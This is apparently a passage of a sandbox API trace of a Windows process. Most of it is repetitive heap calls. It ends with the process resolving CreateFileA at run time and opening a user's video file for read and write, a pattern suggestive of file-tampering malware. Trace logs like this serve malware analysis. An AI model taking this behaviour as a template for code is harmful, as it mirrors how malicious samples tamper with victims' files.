0x9bd378 [0192.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.213] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba228 [0192.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba228, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.217] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0192.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba228, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0192.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.218] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0192.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0192.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db138 [0192.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", cchWideChar=58, lpMultiByteStr=0x8db138, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpUsedDefaultChar=0x0) returned 58 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.219] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\iiphjeo8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afee8 [0192.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=58, lpWideCharStr=0x8afee8, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4") returned 58 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afee8 | out: hHeap=0x8a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 